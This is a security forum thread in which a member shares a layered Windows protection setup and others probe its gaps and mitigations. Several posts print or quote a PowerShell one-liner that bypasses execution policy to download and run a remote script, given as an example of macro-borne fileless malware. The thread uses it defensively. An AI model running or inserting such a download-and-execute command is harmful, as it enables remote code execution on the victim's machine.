Advanced Plus Security Quassar - Desktop PC

Last updated
Sep 7, 2018
Windows Edition
Pro
Security updates
Block all updates
User Access Control
Always notify
Real-time security
Prevention: SpyShelterFirewall + NetLimiter.
Izolation: Shadow Defender + Sandboxie
AV: SecureAPlus BETA (+Avira/APEX)
WEB: Adguard + K9 Web Protection
Firewall security
Periodic malware scanners
Zemana, Malwarebytes, SecureAPlus (+Avira/APEX)
Malware sample testing
I do not participate in malware testing
Browser(s) and extensions
Vivaldi: uMatrix ,Adguard, HTTPS Everywhere, Canvas Defender,
Cookie AutoDelete.
Maintenance tools
DiskPulse, Sysinternals Suite, SysTracer, WinDirStat, AIDA64, WireShark
File and Photo backup
Paragon(on external offline disk) + SpiderOak(Cloud)
System recovery
Paragon(on external offline disk)
Computer specs
https://malwaretips.com/threads/quassar-desktop-pcs.74053/

Quassar

Level 12
Thread author
Verified
Well-known
Feb 10, 2012
585
Droped SpyShelterFW becasue it's made me some incompatibility issues with few programs and games.
As alternative i added bundle from scotty: Winpatrol Plus, WAR and Firewall

Firewall which is more advanced/detalied and have log connection, while SS dont have it yet....
SRP techniques i have in AppGuard which for me are also more advanced.
Keystore encryption now i have from ZemanaAL so i turned zemana from o/d to real time

Cons is only "HIPS swaped to Anti-exe" but with solid HIDS
plus WinAntiRansom but it will dont have much job to do while AppGuard work in background at last i have nice access file/folder log history :D
Imgur: The most awesome images on the Internet
 
Last edited:

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,382
Very nice, advanced and flexible setup. Thanks for sharing.:)
I have 3 questions.
Did you disabled java or javascript?
What method you applied to disable powershell?
How do you protect the system against VBA macros, and other embeded malicious content?
 
Last edited:

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,382
This setup can be very strong when used by an experienced user, like @Quassar. I use a very similar, default deny SRP setup, with Windows Defender and forced SmartScreen (instead of Zemana AntiLogger, Malwarebytes v3, and the standard SmartScreen). AppGuard can easily stop/mitigate most of the 0-day malware files, but I am not sure if it can stop the below fileless PowerShell example (embedded in a Word document macro):

powershell.exe -ExecutionPolicy bypass -noprofile -command "iex(New-Object Net.WebClient).DownloadString('httxx://raw.githubusercontent.com/AndyFul/Hard_Configurator---old-versions/master/Helloworld.ps1')"

Yet, if not so, then in most cases the malware can be stopped on the later infection stage or finally by Shadow Defender. Anyway, the above PowerShell example (and most penetration PowerShell tools) can be stopped by setting Constrained Language mode.

The second problem for an inexperienced user, may be installing the software. Malwarebytes has only the signatures of the recent malware, so the user can infect himself when executing the older installation files (when ignored by SmartScreen).
SmartScreen has known limitations, when the files come from: pendrives (FAT32), memory cards, DVDs, ISO images, *.arj, *.7z (and other containers), or are downloaded by using download managers (accelerators).

The third problem, can arise when the inexperienced user plays with malware (cracks, keygens), assuming that he/she is safe using Shadow Defender. It should be remembered, that in the case of the worms, they can infect easily the home network members and compromise the Internet connection.

There may be some additional, small security loopholes, but none of them should be a serious problem for the experienced user.

Edit

I noticed that Malwarebytes v3 made significant slowdowns on starting some programs in Sandboxie.
 
Last edited:

Quassar

Level 12
Thread author
Verified
Well-known
Feb 10, 2012
585
This setup can be very strong when used by an experienced user, like @Quassar. I use a very similar, default deny SRP setup, with Windows Defender and forced SmartScreen (instead of Zemana AntiLogger, Malwarebytes v3, and the standard SmartScreen). AppGuard can easily stop/mitigate most of the 0-day malware files, but I am not sure if it can stop the below fileless PowerShell example (embedded in a Word document macro):

powershell.exe -ExecutionPolicy bypass -noprofile -command "iex(New-Object Net.WebClient).DownloadString('httxx://raw.githubusercontent.com/AndyFul/Hard_Configurator---old-versions/master/Helloworld.ps1')"

Yet, if not so, then in most cases the malware can be stopped on the later infection stage or finally by Shadow Defender. Anyway, the above PowerShell example (and most penetration PowerShell tools) can be stopped by setting Constrained Language mode.

The second problem for an inexperienced user, may be installing the software. Malwarebytes has only the signatures of the recent malware, so the user can infect himself when executing the older installation files (when ignored by SmartScreen).
SmartScreen has known limitations, when the files come from: pendrives (FAT32), memory cards, DVDs, ISO images, *.arj, *.7z (and other containers), or are downloaded by using download managers (accelerators).

The third problem, can arise when the inexperienced user plays with malware (cracks, keygens), assuming that he/she is safe using Shadow Defender. It should be remembered, that in the case of the worms, they can infect easily the home network members and compromise the Internet connection.

There may be some additional, small security loopholes, but none of them should be a serious problem for the experienced user.

Edit

I noticed that Malwarebytes v3 made significant slowdowns on starting some programs in Sandboxie.

Test it in VMware Workstation

So infection need bypass
1)VMware
2a)HIPS & HIDS + 2 other SRP
2b)Antyvirus + 2 scanners
2c)Windows builded security + hardering which i dont at all trust but any way nice to have not default naked system :p
Addional
3a )And at last it will work tempolary to next reboot so need bypas SD too if wanna encrypt or modify my files permanently.
3b)If virus its keylogger need bypass keyencryption from zemana.

4) i have 2 PCs and to be "Seriously" donno how about you but i dont login to bank from malware lab pc :p
 
  • Like
Reactions: AtlBo and given

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,382
Test it in VMware Workstation

So infection need bypass
1)VMware
2a)HIPS & HIDS + 2 other SRP
2b)Antyvirus + 2 scanners
2c)Windows builded security + hardering which i dont at all trust but any way nice to have not default naked system :p
Addional
3a )And at last it will work tempolary to next reboot so need bypas SD too if wanna encrypt or modify my files permanently.
3b)If virus its keylogger need bypass keyencryption from zemana.

4) i have 2 PCs and to be "Seriously" donno how about you but i dont login to bank from malware lab pc :p
You are secure because you are an experienced user. The inexperienced user will infect himself simply, by ignoring all security alerts, when installing an application (with malware) from a friend's pendrive (he will assume that it is clean).
Strong security for an experienced user, can be useless for the inexperienced one.
Thanks for sharing your setup, there are many experienced users here.:)
 

Quassar

Level 12
Thread author
Verified
Well-known
Feb 10, 2012
585
Yea that is true long time ago when i worked in pc sevice i had so much pc's infected with solid anti-virus installed on it which it could easy delete popular infection but didn't cause user added it to safelist becaue on xxx foum smb wrote is trusted cracker - source^^
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,382
Yea that is true long time ago when i worked in pc sevice i had so much pc's infected with solid anti-virus installed on it which it could easy delete popular infection but didn't cause user added it to safelist becaue on xxx foum smb wrote is trusted cracker - source^^
Ha, ha. They did not use BitDefender free.:)
 
5

509322

AppGuard can easily stop/mitigate most of the 0-day malware files, but I am not sure if it can stop the below fileless PowerShell example (embedded in a Word document macro):

powershell.exe -ExecutionPolicy bypass -noprofile -command "iex(New-Object Net.WebClient).DownloadString('httxx://raw.githubusercontent.com/AndyFul/Hard_Configurator---old-versions/master/Helloworld.ps1')"

Using the default policies, an in-memory powershell script will run with restricted privileges.

The best protection against powershell disaster is to disable powershell and system.management.automation.dll. These policies also cover custom\wrapped powershell executables and .dll.
 
Last edited by a moderator:

Handsome Recluse

Level 23
Verified
Top Poster
Well-known
Nov 17, 2016
1,242
Why have both Adguard and Hostsman? There doesn't seem much frequent extra coverage from the addition. The only thing that should be common are from ubiquitous sites like Google, Facebook and some lesser sites like Amazon and Twitter. Stuff such as those in uBlock Privacy list like

 
Last edited:
  • Like
Reactions: AtlBo and given
5

509322


I have the best solution of all.

Powershell in its entire monstrosity should not be shipped by default with Windows; it should be a user opt-in, manual, standalone installation. Making it such pretty much means only those that actually need and use it - like enterprise Admins - will install it.

It makes no sense that Microsoft ships it, but at the same time advises everyone that does not need it to disable it.

As long as the users continue to allow Microsoft to ram things down their throats that greatly increase the risk of system compromise, Microsoft will continue to do it.

Who is responsible for the mess that is Windows ? Microsoft. And 3rd parties have to fix that mess the best that they can with what they have.
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,382
I have the best solution of all.
...
Powershell in its entire monstrosity should not be shipped by default with Windows; it should be a user opt-in, manual, standalone installation. Making it such pretty much means only those that actually need and use it - like enterprise Admins - will install it.

It makes no sense that Microsoft ships it, but at the same time advises everyone that does not need it to disable it.
...
Bash is another similar problem. Actually, both PowerShell and Bash can be installed by the malware on the target computer, using the remote server. So, even uninstalling PowerShell would not be bulletproof. The Pandora's box is already opened.
Windows is the great example, that something universally useful cannot be safe (Enterprises, administrators, home users, local networks, Active Directory Domains, Internet, many protocols, backward compatibility, several OS shells, remote access, sharing, and much more).
 
Last edited:

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,382
Changed OS malware testing to NO becasue i test it on separate PC/Rasberry which is not connected with rest of my house devices :D
So, are you using the separate router too for maximum security?
 
  • Like
Reactions: given and XhenEd

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top